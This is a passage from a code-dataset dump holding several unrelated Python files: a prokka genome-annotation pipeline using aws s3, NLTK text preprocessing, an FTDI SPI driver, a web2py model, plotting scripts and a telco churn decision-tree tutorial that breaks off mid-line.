min_amounts[index]\n else:\n break\n min_amounts[x] = 1 + minimum\n\n return min_amounts[num]","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275768290","text":"#!/usr/bin/env python3\nimport os\nimport sys\nfrom multiprocessing import Semaphore\nfrom iggtools.common.argparser import add_subcommand, SUPPRESS\nfrom iggtools.common.utils import tsprint, retry, command, multithreading_map, find_files, upload, pythonpath, upload_star, download_reference\nfrom iggtools.models.uhgg import UHGG, get_uhgg_layout, destpath, unified_genome_id\nfrom iggtools.params import outputs\nfrom iggtools.subcommands.import_uhgg import decode_genomes_arg\n\n\nCONCURRENT_PROKKA_RUNS = Semaphore(6)\n\n\n@retry\ndef find_files_with_retry(f):\n return find_files(f)\n\n\n# 1. Occasional failures in aws s3 cp require a retry.\n@retry\ndef download_genome(genome_id, cleaned_genome):\n command(f\"rm -f {genome_id}.fasta\")\n command(f\"aws s3 cp --only-show-errors {cleaned_genome} - | lz4 -dc > {genome_id}.fasta\")\n\n\ndef drop_lz4(filename):\n assert filename.endswith(\".lz4\")\n return filename[:-4]\n\n\ndef prokka_gene_annotation(genome_id, species_id):\n # Prokka will crash if installed <6 months ago. It's a feature. See tbl2asn.\n cleaned_genome = destpath(get_uhgg_layout(species_id, \"fna\", genome_id)[\"imported_genome_file\"])\n ugid = unified_genome_id(genome_id)\n\n download_genome(genome_id, cleaned_genome)\n\n subdir = \"prokka_dir\"\n command(f\"rm -rf {subdir}\")\n\n output_files = [\n f\"{genome_id}.faa\",\n f\"{genome_id}.ffn\",\n f\"{genome_id}.fna\",\n f\"{genome_id}.gff\",\n f\"{genome_id}.tsv\"\n ]\n command(f\"prokka --kingdom Bacteria --outdir {subdir} --cpus 8 --prefix {genome_id} --locustag {ugid} --compliant {genome_id}.fasta\")\n for o in output_files:\n command(f\"mv {subdir}/{o} .\")\n\n return output_files\n\n\ndef annotate_genome(args):\n if args.zzz_slave_toc:\n annotate_genome_slave(args)\n else:\n annotate_genome_master(args)\n\n\ndef annotate_genome_master(args):\n\n # Fetch table of contents from s3.\n # This will be read separately by each species build subcommand, so we make a local copy.\n local_toc = download_reference(outputs.genomes)\n\n db = UHGG(local_toc)\n species_for_genome = db.genomes\n\n def genome_work(genome_id):\n assert genome_id in species_for_genome, f\"Genome {genome_id} is not in the database.\"\n species_id = species_for_genome[genome_id]\n\n dest_file = destpath(get_uhgg_layout(species_id, \"fna\", genome_id)[\"annotation_file\"])\n msg = f\"Annotating genome {genome_id} from species {species_id}.\"\n if find_files_with_retry(dest_file):\n if not args.force:\n tsprint(f\"Destination {dest_file} for genome {genome_id} annotations already exists. Specify --force to overwrite.\")\n return\n msg = msg.replace(\"Importing\", \"Reimporting\")\n\n\n with CONCURRENT_PROKKA_RUNS:\n\n tsprint(msg)\n logfile = get_uhgg_layout(species_id, \"\", genome_id)[\"annotation_log\"]\n slave_log = os.path.basename(logfile)\n slave_subdir = f\"{species_id}__{genome_id}\"\n if not args.debug:\n command(f\"rm -rf {slave_subdir}\")\n if not os.path.isdir(slave_subdir):\n command(f\"mkdir {slave_subdir}\")\n # Recurisve call via subcommand. Use subdir, redirect logs.\n slave_cmd = f\"cd {slave_subdir}; PYTHONPATH={pythonpath()} {sys.executable} -m iggtools annotate_genome --genome {genome_id} --zzz_slave_mode --zzz_slave_toc {os.path.abspath(local_toc)} {'--debug' if args.debug else ''} &>> {slave_log}\"\n with open(f\"{slave_subdir}/{slave_log}\", \"w\") as slog:\n slog.write(msg + \"\\n\")\n slog.write(slave_cmd + \"\\n\")\n try:\n command(slave_cmd)\n finally:\n # Cleanup should not raise exceptions of its own, so as not to interfere with any\n # prior exceptions that may be more informative. Hence check=False.\n upload(f\"{slave_subdir}/{slave_log}\", destpath(logfile), check=False)\n if not args.debug:\n command(f\"rm -rf {slave_subdir}\", check=False)\n\n genome_id_list = decode_genomes_arg(args, species_for_genome)\n multithreading_map(genome_work, genome_id_list, num_threads=20)\n\n\ndef annotate_genome_slave(args):\n \"\"\"\n https://github.com/czbiohub/iggtools/wiki\n \"\"\"\n\n violation = \"Please do not call annotate_genome_slave directly. Violation\"\n assert args.zzz_slave_mode, f\"{violation}: Missing --zzz_slave_mode arg.\"\n assert os.path.isfile(args.zzz_slave_toc), f\"{violation}: File does not exist: {args.zzz_slave_toc}\"\n\n db = UHGG(args.zzz_slave_toc)\n species_for_genome = db.genomes\n\n genome_id = args.genomes\n species_id = species_for_genome[genome_id]\n\n dest_file = destpath(get_uhgg_layout(species_id, \"fna\", genome_id)[\"annotation_file\"])\n last_output = os.path.basename(dest_file)\n\n output_files = prokka_gene_annotation(genome_id, species_id)\n\n upload_tasks = []\n for o in output_files:\n olz = o + \".lz4\"\n otype = o.rsplit(\".\")[-1]\n if olz != last_output:\n upload_tasks.append((o, destpath(get_uhgg_layout(species_id, otype, genome_id)[\"annotation_file\"])))\n\n command(f\"aws s3 rm --recursive {dest_file.rsplit('/', 1)[0]}\")\n multithreading_map(upload_star, upload_tasks)\n\n # Upload this last because it indicates all other work has succeeded.\n upload(drop_lz4(last_output), dest_file)\n\n\ndef register_args(main_func):\n subparser = add_subcommand('annotate_genome', main_func, help='annotate selected genomes with prokka')\n subparser.add_argument('--genomes',\n dest='genomes',\n required=False,\n help=\"genome[,genome...] to import; alternatively, slice in format idx:modulus, e.g. 1:30, meaning annotate genomes whose ids are 1 mod 30; or, the special keyword 'all' meaning all genomes\")\n subparser.add_argument('--zzz_slave_toc',\n dest='zzz_slave_toc',\n required=False,\n help=SUPPRESS) # \"reserved to pass table of contents from master to slave\"\n return main_func\n\n\n@register_args\ndef main(args):\n tsprint(f\"Executing iggtools subcommand {args.subcommand} with args {vars(args)}.\")\n annotate_genome(args)\n","sub_path":"iggtools/subcommands/annotate_genome.py","file_name":"annotate_genome.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"147014183","text":"\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\ndef splitTrainTest(inputDF,random_state):\n\n simpleTrainSet, simpleTestSet = train_test_split(inputDF, test_size=0.2, random_state=random_state)\n\n inputDF[\"income_category\"] = np.ceil(inputDF[\"median_income\"]/1.5)\n inputDF[\"income_category\"].where( inputDF[\"income_category\"] < 5.0 , 5.0, inplace = True )\n\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2,random_state=19)\n for trainIndices, testIndices in split.split(inputDF,inputDF[\"income_category\"]):\n stratifiedTrainSet = inputDF.loc[trainIndices]\n stratifiedTestSet = inputDF.loc[testIndices]\n\n print('\\ninputDF[\"income_category\"].value_counts() / len(inputDF)')\n print( inputDF[\"income_category\"].value_counts() / len(inputDF) )\n\n for set in (stratifiedTrainSet,stratifiedTestSet):\n set.drop([\"income_category\"],axis=1,inplace=True)\n\n ### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ###\n return( stratifiedTrainSet , stratifiedTestSet )\n # return( simpleTrainSet, simpleTestSet )\n\n","sub_path":"exercises/ML/general/geron-handson-ML/02-end2End/src/splitTrainTest.py","file_name":"splitTrainTest.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"467352894","text":"# -*- coding: utf-8 -*\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nfrom nltk.stem.lancaster import LancasterStemmer\nfrom nltk.stem import PorterStemmer\n\nfrom textblob import TextBlob\n\nfile = open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\myfolder\\\\corpora\\\\the-old-man-and-the-sea.txt\")\nraw = file.read()\nwordFile = open (\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\myfolder\\\\corpora\\\\stats\\\\the-old-man-and-the-sea-words.txt\", 'w' )\n\nlemmatizer = WordNetLemmatizer()\nstopset = set(stopwords.words('english'))\n\ntry:\n #使用textblob替代nltk\n textblob = TextBlob(raw)\n tokens = textblob.words\n #tokens = nltk.word_tokenize(raw)\n\n #1 lemmatization\n #ADJ, ADJ_SAT, ADV, NOUN, VERB = 'a', 's', 'r', 'n', 'v'\n all = []\n for pos in tokens:\n origform = \"\"\n adjform = \"\"\n adtform = \"\"\n advform = \"\"\n nounform = \"\"\n verbform = \"\"\n otherform = \"\"\n if(pos.isalpha()) and pos.lower not in stopset:\n origform = pos.lower()\n\n adjform = lemmatizer.lemmatize(pos.lower(),'a')\n if adjform != origform and adjform not in stopset:\n all.append((adjform))\n continue\n\n adtform = lemmatizer.lemmatize(pos.lower(),'s')\n if adtform != origform and adtform not in stopset:\n all.append((adtform))\n continue\n\n advform = lemmatizer.lemmatize(pos.lower(),'r')\n if advform != origform and advform not in stopset:\n all.append((advform))\n continue\n\n nounform = lemmatizer.lemmatize(pos.lower(),'n')\n if nounform != origform and nounform not in stopset:\n all.append((nounform))\n continue\n\n verbform = lemmatizer.lemmatize(pos.lower(),'v')\n if verbform != origform and verbform not in stopset:\n all.append((verbform))\n continue\n\n otherform = lemmatizer.lemmatize(pos.lower())\n if otherform not in stopset:\n all.append((otherform))\n\n for word in all:\n wordFile.write (word + ' ')\n\n #distinctAll = nltk.FreqDist(all).most_common()\n #print distinctAll\n\nfinally:\n file.close()\n wordFile.close()\n","sub_path":"untitled/work/nlpPreAnalyzeNovel.py","file_name":"nlpPreAnalyzeNovel.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"487632608","text":"#This Driver Configure the FTDI Device with SPI Functionality using MPSSE Mode\nimport d2xx\nimport sys\nimport time\n\nclass MPSSE_SPI(object):\n\t\n\tdef __init__(self,port):\n\t\t#List of FTDI Devices Available\n\t\tdevAvail = d2xx.listDevices()\n\t\tif not devAvail:\n\t\t\tprint(\"Error - Check your Connection to FTDI Device\")\n\t\telse:\t\n\t\t\tself.port=d2xx.open(port)\n\t\t\tself.port.resetDevice()\n\t\t\tdataToRead=self.port.getQueueStatus()\n\t\t\twhile dataToRead:\n\t\t\t\tdataRBuff=self.port.read(dataToRead)\n\t\t\t\tdataToRead=self.port.getQueueStatus()\n\t\t\tprint(\"Connection to Port %d established\"%port)\n\t\t\t\n\tdef DevConf(self,baudrate):\n\t\tself.port.setUSBParameters(65536,65535)\t\t\t\t\t#USB request Transfer size\n\t\tself.port.setChars('0',0,'0',0)\t\t\t\t\t\t\t#Disable Event and error characters\n\t\tself.port.setTimeouts(0,5000)\n\t\tself.port.setLatencyTimer(16)\n\t\tself.port.setBitMode(0,0)\t\t\t\t\t\t\t\t#reset Controller\n\t\tself.port.setBitMode(0,2)\t\t\t\t\t\t\t\t#MPSSE Mode Enable\n\t\t\n\t\t#MPSSE Synchornisation and Receiving Back Bad Commands\n\t\tdataTBuff = 'AA'.decode('hex')\n\t\tself.port.write(dataTBuff)\n\t\ttime.sleep(0.1)\n\t\tdataToRead=self.port.getQueueStatus()\n\t\twhile dataToRead:\n\t\t\tdataRBuff=self.port.read(dataToRead)\n\t\t\tif dataRBuff[0] != '\\xFA' and dataRBuff[1] != '\\xAA':\n\t\t\t\tprint(\"Error - MPSSE is not Synchronized!\")\n\t\t\telse:\n\t\t\t\tprint(\"MPSSE - Synchronized and Ready of Data Transaction!\")\n\t\t\tdataToRead=self.port.getQueueStatus()\n\t\t\t\n\t\t#Configure the MPSSE for SPI communication\n\t\t#Configure MPSSE I2C settings\n\t\tdataTBuff=\"8A978D\".decode('hex')\t\t\t\t#3Phase Clock Disabled\n\t\tself.port.write(dataTBuff)\n\t\tdataTBuff=\"80000B\".decode('hex')\n\t\tself.port.write(dataTBuff)\n\t\tdataTBuff=(\"86\"+baudrate).decode('hex')\n\t\tself.port.write(dataTBuff)\t\t\n\t\t#Turn off Loopback\n\t\tself.port.write('\\x85')\n\t\ttime.sleep(5)\n\t\t\n\tdef SPI_CS_Enable(self):\n\t\tdataTBuff='80080B'\n\t\tfor i in range(5):\n\t\t\tself.port.write(dataTBuff.decode('hex'))\n\t\n\tdef SPI_CS_Disable(self):\n\t\tdataTBuff='80080B'\n\t\tfor i in range(5):\n\t\t\tself.port.write(dataTBuff.decode('hex'))\t\n\t\t\t\n\tdef SPI_Write(self,datalen,data):\n\t\t\n\t\tself.port.write(dataTBuff.decode('hex'))\n\t\t\t\t\t\t\n\tdef SPI_Read(self,datalen):\n\t\tdataTBuff = \"80000B24\"+datalen[2:]+datalen[0:2]+\"80080B\"\n\t\tself.port.write(dataTBuff.decode('hex'))\n\t\tdataToRead=0\n\t\twhile not dataToRead:\n\t\t\tdataToRead = self.port.getQueueStatus()\n\t\tdataRBuff = self.port.read(dataToRead)\n\t\treturn dataRBuff\n\t\t\n\tdef SPI_RW(self,datalen,data):\n\t\tdataTBuff = \"80000B110000\"+data+\"24\"+datalen[2:]+datalen[0:2]+\"80080B\"\n\t\tself.port.write(dataTBuff.decode('hex'))\n\t\tdataToRead=0\n\t\twhile not dataToRead:\n\t\t\tdataToRead = self.port.getQueueStatus()\n\t\tdataRBuff = self.port.read(dataToRead)\n\t\treturn dataRBuff\n\t\t\n\t\t\t","sub_path":"Archived_Files/SPI_FTDI_MS25PE10/etc_spi_lib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"327583095","text":"__author__ = 'shenli'\nfrom Data.DataModel.StockBasics import stock_basics\nfrom GetDataTask import chooseStock\nfrom GetDataTask import runChangLunModel\n\nstartDate = '2006-09-13'\nendDate = '2016-09-13'\nfreq = 'D'\ntradeDate = '2007-09-13'\nstocks = stock_basics.select()\nfor stock in stocks:\n runChangLunModel.delay(stock.code,startDate,endDate,freq,tradeDate)","sub_path":"chooseStockCelery.py","file_name":"chooseStockCelery.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"578485615","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 12 17:45:42 2019\n\n@author: Daniel Chong\n\"\"\"\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nG = nx.DiGraph() \nG.add_edge('I', 'a', weight=0.6)\nG.add_edge('a', 'b', weight=0.6)\nG.add_edge('b', 'c', weight=0.6)\nG.add_edge('c', 'd', weight=0.6)\nG.add_edge('d', 'e', weight=0.7)\nG.add_edge('e', 'F', weight=0.7)\npos = nx.kamada_kawai_layout(G, weight='weight', scale=1, center=None,dim=2)\nlabels = {('I', 'a' ):'20', ('b','c'):'70',('c','d'):'10'}\nsize = [700, 700, 700, 700, 700, 700,700] \ncolor=[ \"#2da05f\" , \"#A0CBE2\", \"#A0CBE2\", \"#A0CBE2\", \"#A0CBE2\", \"#A0CBE2\", \"#A0CBE2\" ]\nnx.draw(G, pos=pos, with_labels = True, scale=1, align='vertical',center=None,edge_color='black',node_color=color,font_size=20, width=2)\nnx.draw_networkx_edge_labels(G,pos, labels, font_size=10, font_color='red') \nnx.draw_networkx_nodes( G, pos, node_size=700, node_color=color)\nnx.draw_networkx_edges( G, pos,width=6, edge_color='blue')\nnx.draw_networkx_labels(G, pos, font_size=20, font_family='sans-serif')\nplt.axis('off')\nplt.savefig(\"GrafoSimpleDAcicNew.eps\") \nplt.show()","sub_path":"Tarea2/GSDA.py","file_name":"GSDA.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"551658539","text":"# coding: utf8\n\n\n\"\"\"\njust copy paste this code into your model and replace dbMatronasur to something\nyou prefer or what is used in your code, another thing that should be known is that\nthis code still cannot distinguish what exactly should be in reference title - name\nwhen you use generic appadmin so please remove all fiealds you don't need not require \n\"\"\"\n\"\"\"\ndatabase class object creation\n\"\"\"\ndbMatronasur = DAL(\"sqlite://storage.sqlite\")\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"cursos_tipo\",\n SQLField(\"nombre\", \"string\", length=100, notnull=True, default=None), format='%(nombre)s')\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"centros\",\n SQLField(\"nombre\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"direccion\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"localidad\", \"string\", length=100, notnull=True, default=None), format='%(nombre)s')\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"cursos\",\n SQLField(\"nombre\"),\n SQLField(\"id_centros\", dbMatronasur.centros),\n SQLField(\"id_cursos_tipo\", dbMatronasur.cursos_tipo),\n SQLField(\"fecha_ini\", \"date\", notnull=True, default=None),\n SQLField(\"fecha_fin\", \"date\", notnull=True, default=None),\n SQLField(\"hora_ini\", \"time\", notnull=True, default=None),\n SQLField(\"hora_fin\", \"time\", notnull=True, default=None),\n SQLField(\"Finalizado\", \"boolean\", default=False),\n migrate=True)\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"mutuas\",\n SQLField(\"nombre\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"email\", \"string\", length=200, notnull=False, default=None),\n SQLField(\"telefono\", \"string\", length=9, notnull=False, default=None),format='%(nombre)s')\n \n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"alumnos\",\n SQLField(\"nombre\", \"string\", length=100, notnull=True, default=None),\n SQLField(\"apellidos\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"nif\", \"string\", length=9, notnull=True, default=None),\n SQLField(\"direccion\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"localidad\", \"string\", length=100, notnull=True, default=None),\n SQLField(\"cod_postal\", \"integer\", notnull=True, default=None),\n SQLField(\"seg_social\", \"string\", length=14, notnull=True, default=None),\n SQLField(\"id_mutuas\",dbMatronasur.mutuas),\n SQLField(\"telefono\", \"string\", length=9, notnull=False, default=None),\n SQLField(\"email\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"profesion\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"nombre_pareja\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"apellidos_pareja\", \"string\", length=200, notnull=False, default=None),\n SQLField(\"edad_apreja\", \"integer\", notnull=False, default=None),\n SQLField(\"profesion_pareja\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"hijos\", \"integer\", notnull=False, default=None),\n SQLField(\"fur\", \"date\", notnull=True, default=None),\n SQLField(\"ginecologo\", \"string\", length=200, notnull=False, default=None),\n SQLField(\"centro_control\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"centro_luz\", \"string\", length=100, notnull=False, default=None),\n SQLField(\"publicidad\", \"boolean\", default=False),\n SQLField(\"volante\", \"boolean\", default=False))\n \n\n\n\n\n\n\n\n\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"docentes\",\n SQLField(\"nombre\", \"string\", length=100, notnull=True, default=None),\n SQLField(\"apellidos\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"nif\", \"string\", length=9, notnull=True, default=None),\n SQLField(\"direccion\", \"string\", length=200, notnull=True, default=None),\n SQLField(\"localidad\", \"string\", length=100, notnull=True, default=None),\n SQLField(\"cod_postal\", \"integer\", notnull=True, default=None),\n SQLField(\"seg_social\", \"integer\", notnull=True, default=None), format='%(apellidos)s,%(nombre)s')\n\n\n\"\"\"\nTable definition\n\"\"\"\n\ndbMatronasur.define_table(\"alumnos_cursos\",\n SQLField(\"id_alumnos\", dbMatronasur.alumnos),\n SQLField(\"id_cursos\", dbMatronasur.cursos))\n\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"alumnos_centros\",\n SQLField(\"id_alumnos\", dbMatronasur.alumnos),\n SQLField(\"id_centros\", dbMatronasur.centros))\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"cursos_docentes\",\n SQLField(\"id_cursos\", dbMatronasur.cursos),\n SQLField(\"id_docentes\", dbMatronasur.docentes))\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"volantes\",\n SQLField(\"numero\", \"string\", length=10, notnull=True, default=None),\n SQLField(\"id_alumnos\", dbMatronasur.alumnos),\n SQLField(\"descripcion\", \"integer\", notnull=True, default=None))\n\n\n\"\"\"\nTable definition\n\"\"\"\ndbMatronasur.define_table(\"nominas\",\n SQLField(\"id_docentes\", dbMatronasur.docentes),\n SQLField(\"documento\", \"upload\", notnull=True, default=None))\n \n\n\n\n\"\"\"\nRelations between tables (remove fields you don't need from requires)\n\"\"\"\ndbMatronasur.alumnos.id_mutuas.requires=IS_IN_DB(dbMatronasur, 'mutuas.id','%(nombre)s')\ndbMatronasur.cursos.id_centros.requires=IS_IN_DB(dbMatronasur, 'centros.id','%(nombre)s')\ndbMatronasur.cursos.id_cursos_tipo.requires=IS_IN_DB(dbMatronasur, 'cursos_tipo.id','%(nombre)s')\ndbMatronasur.alumnos_cursos.id_alumnos.requires=IS_IN_DB(dbMatronasur, 'alumnos.id','%(apellidos)s, %(nombre)s')\ndbMatronasur.alumnos_cursos.id_cursos.requires=IS_IN_DB(dbMatronasur, 'cursos.id','%(nombre)s, %(fecha_ini)s')\ndbMatronasur.alumnos_centros.id_alumnos.requires=IS_IN_DB(dbMatronasur, 'alumnos.id','%(nombre)s')\ndbMatronasur.alumnos_centros.id_centros.requires=IS_IN_DB(dbMatronasur, 'centros.id','%(nombre)s')\ndbMatronasur.cursos_docentes.id_cursos.requires=IS_IN_DB(dbMatronasur, 'cursos.id')\ndbMatronasur.cursos_docentes.id_docentes.requires=IS_IN_DB(dbMatronasur, 'docentes.id','%(nombre)s')\ndbMatronasur.volantes.id_alumnos.requires=IS_IN_DB(dbMatronasur, 'alumnos.id','%(nombre)s')\ndbMatronasur.nominas.id_docentes.requires=IS_IN_DB(dbMatronasur, 'docentes.id','%(apellidos)s,%(nombre)s')\n\n\n\n## by default give a view/generic.extension to all actions from localhost\n## none otherwise. a pattern can be 'controller/function.extension'\nresponse.generic_patterns = ['*'] if request.is_local else []\n## (optional) optimize handling of static files\n# response.optimize_css = 'concat,minify,inline'\n# response.optimize_js = 'concat,minify,inline'\n\n#########################################################################\n## Here is sample code if you need for\n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - old style crud actions\n## (more options discussed in gluon/tools.py)\n#########################################################################\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\nauth = Auth(db, hmac_key=Auth.get_or_create_key())\ncrud, service, plugins = Crud(db), Service(), PluginManager()\n\n## create all tables needed by auth if not custom tables\nauth.define_tables()\n\n## configure email\nmail=auth.settings.mailer\nmail.settings.server = 'logging' or 'smtp.gmail.com:587'\nmail.settings.sender = 'you@gmail.com'\nmail.settings.login = 'username:password'\n\n## configure auth policy\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True\n\n## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.\n## register with janrain.com, write your domain:api_key in private/janrain.key\nfrom gluon.contrib.login_methods.rpx_account import use_janrain\nuse_janrain(auth,filename='private/janrain.key')\n\n#########################################################################\n## Define your tables below (or better in another model file) for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\n","sub_path":"models/matronasur.py","file_name":"matronasur.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149923528","text":"import json\nimport os\nimport sys\nfrom glob import glob\n\ninput_dir = sys.argv[1]\ndata = []\nfor input_filename in glob(input_dir + '/*.json', recursive=False):\n with open(input_filename, 'r', encoding='utf8') as r:\n page_id = int(os.path.splitext(os.path.basename(input_filename))[0].split('_')[-1])\n m = json.load(r)\n for c in m:\n c['page_id'] = page_id\n data.extend(m)\noutput_filename = os.path.splitext(os.path.basename(input_dir))[0]\nwith open(output_filename + '.json', 'w', encoding='utf8') as w:\n json.dump(data, w, indent=2, ensure_ascii=False)\n","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"211174124","text":"import math\nimport sys\nfrom time import sleep\nz = 600851475143\nb = 0\ni = 1\nwhile i < math.sqrt(z):\n if z%i == 0:\n if (3**i - 3)%i != 0:\n u = 0\n else:\n e = i\n if i > 6857 and int((i/(math.sqrt(z)))*100) != b:\n b = int((i/(math.sqrt(z)))*100)\n sys.stdout.write('\\r')\n sys.stdout.write(str(b+1))\n sys.stdout.write('%')\n sys.stdout.flush()\n sleep(0.01)\n i += 1\nprint ('\\r', e)","sub_path":"Secondaire/P3.03.py","file_name":"P3.03.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"622564126","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 15 12:15:11 2018\n\n@author: kimi\n\"\"\"\n\n# Import libraries & funtions ------------------------------------------------\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\n\nprint(os.getcwd())\n#os.chdir('C:/Users/202-22/Documents/Python - Hyesu/Project/telco')\nos.chdir('D:/Data/Python/project')\n\n\n# Load dataset ----------------------------------------------------------------\ntrain_path = \"../data/telco/telco_data_preprocessed.csv\"\n\ntrain = pd.read_csv(train_path, engine='python')\n\ntrain.shape # 7043 x 21\ntrain.head()\ntrain.info()\ntrain.isnull().sum() # no missing value\ntrain.describe()\n\n# 20 predictor variables and 1 target variable('Churn')\ntrain['Churn'].value_counts() # no:5174, yes:1869\n\n\n# Modeling - Decision Tree Classification -------------------------------------\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\ntrain2 = train.copy()\n\nX_train = train2.drop('Churn',axis=1, inplace=True)\ny_train = train['Churn']\n\nX_tr, X_va, y_tr, y_va = train_test_split(X_train, y_train, test_size=0.3, random_state=0)\nprint(X_tr.shape, y_tr.shape)\nprint(X_va.shape, y_va.shape)\n\ntree = DecisionTreeClassifier(random_state=0)\ntree.fit(X_tr, y_tr) \n# !! ISSUE !!: this model only consider numerical categorical featutres as categorical features.\n\n\n# Solution 1 - Numeric encoding -----------------------------------------------\n# gather only categorical features for one-hot encoding process\n\ncategory = ['gender', 'SeniorCitizen', 'Partner', 'Dependents', 'PhoneService',\n 'MultipleLines', 'InternetService', 'OnlineSecurity', 'OnlineBackup',\n 'DeviceProtection', 'TechSupport', 'StreamingTV', 'StreamingMovies',\n 'Contract', 'PaperlessBilling', 'PaymentMethod']\n\ncat_data = pd.DataFrame(data=train, columns=category)\ncat_data.shape\n\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.pipeline import Pipeline\n\n## Load a class : MultiColumnLabelEncoder \n\nclass MultiColumnLabelEncoder:\n def __init__(self,columns = None):\n self.columns = columns # array of column names to encode\n\n def fit(self,X,y=None):\n return self # not relevant here\n\n def transform(self,X):\n '''\n Transforms columns of X specified in self.columns using\n LabelEncoder(). If no columns specified, transforms all\n columns in X.\n '''\n output = X.copy()\n if self.columns is not None:\n for col in self.columns:\n output[col] = LabelEncoder().fit_transform(output[col])\n else:\n for colname,col in output.iteritems():\n output[colname] = LabelEncoder().fit_transform(col)\n return output\n\n def fit_transform(self,X,y=None):\n return self.fit(X,y).transform(X)\n\n# reference: https://stackoverflow.com/questions/24458645/label-encoding-across-multiple-columns-in-scikit-learn\n\n\n# apply this class to cat_data \n \nencoded_cat = MultiColumnLabelEncoder(columns = category).fit_transform(cat_data)\nencoded_cat.head()\n\nfor i in category:\n print(\"Frequency table for\", i, \"\\n\", encoded_cat[i].value_counts(), \"\\n\")\n\n\n# Back to Modeling - Decision Tree Classification -----------------------------\n# Data combination: encoded categorical features + standardized continuous features\n\ncontinuous = ['tenure', 'MonthlyCharges', 'TotalCharges']\ncond_data = pd.DataFrame(data=train, columns= continuous)\n\nfinal_data = pd.concat([cond_data, encoded_cat], axis=1)\nfinal_data.info()\n\n\n# Train/Test data partition ---------------------------------------------------\n\nX_train = final_data\ny_train = train['Churn']\n\nX_tr, X_va, y_tr, y_va = train_test_split(X_train, y_train, test_size=0.3, random_state=0)\nprint(X_tr.shape, y_tr.shape) # 4930 x 19\nprint(X_va.shape, y_va.shape) # 2113 x 19\n\n\n# Standarization of the continuous features\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\nscaler.fit(X_tr)\nX_tr_scaled = scaler.transform(X_tr)\nX_va_scaled = scaler.transform(X_va)\n\n\n# Modeling - Decision Tree Classification -------------------------------------\n\ntree = DecisionTreeClassifier(random_state=0)\ntree.fit(X_tr_scaled, y_tr)\n\nprint(\"train data accuracy: 